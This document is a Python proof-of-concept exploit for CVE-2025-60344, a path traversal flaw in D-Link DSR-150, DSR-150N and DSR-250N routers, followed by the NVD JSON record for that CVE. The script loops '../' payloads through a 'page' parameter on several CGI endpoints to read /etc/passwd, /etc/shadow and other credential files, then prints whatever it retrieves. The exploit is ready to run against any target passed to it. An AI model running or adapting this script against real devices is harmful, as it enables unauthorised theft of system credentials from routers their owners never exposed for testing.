CVE-2025-60344

# CVE-2025-60344 - D-Link DSR Series Router Path Traversal PoC # Affected: DSR-150, DSR-150N, DSR-250N v1.09B32_WW # Author: Security Researcher import requests import sys from urllib.parse import quote TARGET = sys.argv[1] if len(sys.argv) > 1 else "http://192.168.1.1" PORT = 80 def exploit_path_traversal(target, port, path): """ Exploit path traversal by injecting '../' sequences into vulnerable parameter """ base_url = f"http://{target}:{port}" # Common vulnerable endpoints in D-Link DSR routers vulnerable_endpoints = [ "/cgi-bin/webproc", "/scgi-bin/platform.cgi", "/login.cgi", ] # Target sensitive files target_files = [ "/etc/passwd", "/etc/shadow", "/etc/config/accounts", "/var/passwd", "/var/secret", "/tmp/var/passwd", ] traversal_payload = "../../../../../../../../.." for endpoint in vulnerable_endpoints: for target_file in target_files: payload = traversal_payload + target_file encoded_payload = quote(payload) url = f"{base_url}{endpoint}?page={encoded_payload}" try: response = requests.get(url, timeout=10, verify=False) if response.status_code == 200 and "root:" in response.text: print(f"[+] Vulnerability confirmed at {endpoint}") print(f"[+] File accessed: {target_file}") print(f"[+] Response:\n{response.text[:500]}") return True except requests.exceptions.RequestException as e: continue return False if __name__ == "__main__": print(f"[*] Targeting: {TARGET}") if exploit_path_traversal(TARGET, PORT, ""): print("[+] Exploit successful!") else: print("[-] Target may not be vulnerable or not reachable")

{"cve": {"id": "CVE-2025-60344", "sourceIdentifier": "[email protected]", "published": "2025-10-21T15:15:39.220", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A path traversal (directory traversal) vulnerability in D-Link DSR series routers allows unauthenticated remote attackers to manipulate input parameters used for file or directory path resolution (e.g., via sequences such as “../”). Successful exploitation may allow access to files outside of the intended directory, potentially exposing sensitive system or configuration files. The issue results from insufficient validation or sanitization of user-supplied input. Affected Products include: DSR-150, DSR-150N, and DSR-250N v1.09B32_WW."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 4.0}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:H", "baseScore": 6.6, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 4.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-24"}]}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}]}], "references": [{"url": "https://github.com/fyoozr/D-Link-DSR-N250-LFI-Vulnerability/", "source": "[email protected]"}, {"url": "https://github.com/fyoozr/vulnerability-research/tree/main/CVE-2025-60344", "source": "[email protected]"}]}}